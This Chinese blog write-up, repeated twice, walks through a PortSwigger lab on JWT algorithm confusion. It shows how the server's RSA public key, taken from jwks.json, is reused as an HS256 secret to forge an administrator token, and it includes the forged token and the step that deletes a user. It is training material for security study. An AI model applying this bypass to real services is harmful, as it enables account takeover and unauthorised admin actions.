JWT 算法混淆攻击一、前言JWT 算法混淆漏洞成因该漏洞本质是服务端验证逻辑的两个失误信任alg字段服务端未强制固定验签算法而是听从 JWT Header 中的alg声明。密钥上下文混淆当算法被改为 HS256对称加密时服务端错误地复用RSA 公钥作为 HMAC 的密钥。正常情况下公钥仅用于验签 RS256 签名。但在 HS256 模式下公钥变成了“对称密钥”。因为公钥是公开的攻击者即可用它伪造签名通过服务端验证。二、靶场测试靶场地址需注册账号https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion1. 进入靶场进入靶场点击My account进入登录页面输入账号密码登录:wiener peter进入admin界面显示只有administrator用户才能使用2. 获取公钥访问jwks.json获取服务器的RSA公钥{kty:RSA,e:AQAB,use:sig,kid:4c7c90f0-f586-4caf-916f-cb261365751e,alg:RS256,n:tmF7ZxEtKCB042bKRwSfCEs1brWUpfDnVyIORK-APdxTa8IUdVef3duwnmzbOjVdPM5jKmEYWfG8GEiqebrZ2Vd__1rXa0nluSUe-FWkEN2Z7oLn8RYOa6Qa2CRpCxwvJ4aVN3ogDbCHXDsZnnneIVk47dj8JFu9xta8xFo7S1UYaTMmvTCeAMPj67X5FyVyyAR2vl4UN3ISM9-8NxyL-BL5O0x-Pa70j17_KZkQEJMG_CZpUn-JNx9SmTwCKzAxX_vs_aW3ytiJBSOYK1M0RWdiskz9LbZnHNxRaggbhVKQnN2kkIMdI5xUDqSr-XCjS901PddwoEkaZWOCA9aISw}使用在线网站一键转换为PEM格式公钥也可以自己编写Python脚本或者使用Burp的JWT Editor地址https://atools.live/zh-cn/tools/pem-jwk-toolkit-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtmF7ZxEtKCB042bKRwSf CEs1brWUpfDnVyIORKAPdxTa8IUdVef3duwnmzbOjVdPM5jKmEYWfG8GEiqebrZ 2Vd//1rXa0nluSUeFWkEN2Z7oLn8RYOa6Qa2CRpCxwvJ4aVN3ogDbCHXDsZnnne IVk47dj8JFu9xta8xFo7S1UYaTMmvTCeAMPj67X5FyVyyAR2vl4UN3ISM98NxyL BL5O0xPa70j17/KZkQEJMG/CZpUnJNx9SmTwCKzAxX/vs/aW3ytiJBSOYK1M0 RWdiskz9LbZnHNxRaggbhVKQnN2kkIMdI5xUDqSrXCjS901PddwoEkaZWOCA9aI SwIDAQAB -----END PUBLIC KEY-----在jwt.io用该公钥对自己的JWT验签可以看到验签成功3. 构造JWT由于在jwt.io直接粘贴公钥构造签名会出错经过检查发现是0d0a换行的问题所以这里用CyberChef转换一下替换0d0a为0a然后编码成URL safe的Base64LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF0bUY3WnhFdEtDQjA0MmJLUndTZgpDRXMxYnJXVXBmRG5WeUlPUksrQVBkeFRhOElVZFZlZjNkdXdubXpiT2pWZFBNNWpLbUVZV2ZHOEdFaXFlYnJaCjJWZC8vMXJYYTBubHVTVWUrRldrRU4yWjdvTG44UllPYTZRYTJDUnBDeHd2SjRhVk4zb2dEYkNIWERzWm5ubmUKSVZrNDdkajhKRnU5eHRhOHhGbzdTMVVZYVRNbXZUQ2VBTVBqNjdYNUZ5Vnl5QVIydmw0VU4zSVNNOSs4Tnh5TAorQkw1TzB4K1BhNzBqMTcvS1prUUVKTUcvQ1pwVW4rSk54OVNtVHdDS3pBeFgvdnMvYVczeXRpSkJTT1lLMU0wClJXZGlza3o5TGJabkhOeFJhZ2diaFZLUW5OMmtrSU1kSTV4VURxU3IrWENqUzkwMVBkZHdvRWthWldPQ0E5YUkKU3dJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg进入Encoder界面Header的RS256带有SHA-256的 RSA 签名改为HS256带有 SHA-256 的HMACPayload的sub改为administratorSecret填入刚才的Base64编码后的PEM公钥eyJraWQiOiI0YzdjOTBmMC1mNTg2LTRjYWYtOTE2Zi1jYjI2MTM2NTc1MWUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc3MzUwNTAzNiwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.s2UHOkkOGGiazE4JgW8E2SoLLNkGbBcbCrBRSHHIrG44.验证访问my-account接口Cookie换成构造的JWT显示当前用户为administrator可以访问admin接口了这里抓包替换查看更直观一点点击Delete抓包替换一下JWT删除用户成功通关成功本文作者CVE-柠檬iCSDNhttps://blog.csdn.net/weixin_49125123博客园https://www.cnblogs.com/CVE-Lemon先知社区https://xz.aliyun.com/users/136909微信公众号Lemon安全
JWT 算法混淆攻击
发布时间:2026/5/18 20:40:37
JWT 算法混淆攻击一、前言JWT 算法混淆漏洞成因该漏洞本质是服务端验证逻辑的两个失误信任alg字段服务端未强制固定验签算法而是听从 JWT Header 中的alg声明。密钥上下文混淆当算法被改为 HS256对称加密时服务端错误地复用RSA 公钥作为 HMAC 的密钥。正常情况下公钥仅用于验签 RS256 签名。但在 HS256 模式下公钥变成了“对称密钥”。因为公钥是公开的攻击者即可用它伪造签名通过服务端验证。二、靶场测试靶场地址需注册账号https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion1. 进入靶场进入靶场点击My account进入登录页面输入账号密码登录:wiener peter进入admin界面显示只有administrator用户才能使用2. 获取公钥访问jwks.json获取服务器的RSA公钥{kty:RSA,e:AQAB,use:sig,kid:4c7c90f0-f586-4caf-916f-cb261365751e,alg:RS256,n:tmF7ZxEtKCB042bKRwSfCEs1brWUpfDnVyIORK-APdxTa8IUdVef3duwnmzbOjVdPM5jKmEYWfG8GEiqebrZ2Vd__1rXa0nluSUe-FWkEN2Z7oLn8RYOa6Qa2CRpCxwvJ4aVN3ogDbCHXDsZnnneIVk47dj8JFu9xta8xFo7S1UYaTMmvTCeAMPj67X5FyVyyAR2vl4UN3ISM9-8NxyL-BL5O0x-Pa70j17_KZkQEJMG_CZpUn-JNx9SmTwCKzAxX_vs_aW3ytiJBSOYK1M0RWdiskz9LbZnHNxRaggbhVKQnN2kkIMdI5xUDqSr-XCjS901PddwoEkaZWOCA9aISw}使用在线网站一键转换为PEM格式公钥也可以自己编写Python脚本或者使用Burp的JWT Editor地址https://atools.live/zh-cn/tools/pem-jwk-toolkit-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtmF7ZxEtKCB042bKRwSf CEs1brWUpfDnVyIORKAPdxTa8IUdVef3duwnmzbOjVdPM5jKmEYWfG8GEiqebrZ 2Vd//1rXa0nluSUeFWkEN2Z7oLn8RYOa6Qa2CRpCxwvJ4aVN3ogDbCHXDsZnnne IVk47dj8JFu9xta8xFo7S1UYaTMmvTCeAMPj67X5FyVyyAR2vl4UN3ISM98NxyL BL5O0xPa70j17/KZkQEJMG/CZpUnJNx9SmTwCKzAxX/vs/aW3ytiJBSOYK1M0 RWdiskz9LbZnHNxRaggbhVKQnN2kkIMdI5xUDqSrXCjS901PddwoEkaZWOCA9aI SwIDAQAB -----END PUBLIC KEY-----在jwt.io用该公钥对自己的JWT验签可以看到验签成功3. 构造JWT由于在jwt.io直接粘贴公钥构造签名会出错经过检查发现是0d0a换行的问题所以这里用CyberChef转换一下替换0d0a为0a然后编码成URL safe的Base64LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF0bUY3WnhFdEtDQjA0MmJLUndTZgpDRXMxYnJXVXBmRG5WeUlPUksrQVBkeFRhOElVZFZlZjNkdXdubXpiT2pWZFBNNWpLbUVZV2ZHOEdFaXFlYnJaCjJWZC8vMXJYYTBubHVTVWUrRldrRU4yWjdvTG44UllPYTZRYTJDUnBDeHd2SjRhVk4zb2dEYkNIWERzWm5ubmUKSVZrNDdkajhKRnU5eHRhOHhGbzdTMVVZYVRNbXZUQ2VBTVBqNjdYNUZ5Vnl5QVIydmw0VU4zSVNNOSs4Tnh5TAorQkw1TzB4K1BhNzBqMTcvS1prUUVKTUcvQ1pwVW4rSk54OVNtVHdDS3pBeFgvdnMvYVczeXRpSkJTT1lLMU0wClJXZGlza3o5TGJabkhOeFJhZ2diaFZLUW5OMmtrSU1kSTV4VURxU3IrWENqUzkwMVBkZHdvRWthWldPQ0E5YUkKU3dJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg进入Encoder界面Header的RS256带有SHA-256的 RSA 签名改为HS256带有 SHA-256 的HMACPayload的sub改为administratorSecret填入刚才的Base64编码后的PEM公钥eyJraWQiOiI0YzdjOTBmMC1mNTg2LTRjYWYtOTE2Zi1jYjI2MTM2NTc1MWUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc3MzUwNTAzNiwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.s2UHOkkOGGiazE4JgW8E2SoLLNkGbBcbCrBRSHHIrG44.验证访问my-account接口Cookie换成构造的JWT显示当前用户为administrator可以访问admin接口了这里抓包替换查看更直观一点点击Delete抓包替换一下JWT删除用户成功通关成功本文作者CVE-柠檬iCSDNhttps://blog.csdn.net/weixin_49125123博客园https://www.cnblogs.com/CVE-Lemon先知社区https://xz.aliyun.com/users/136909微信公众号Lemon安全
)
)
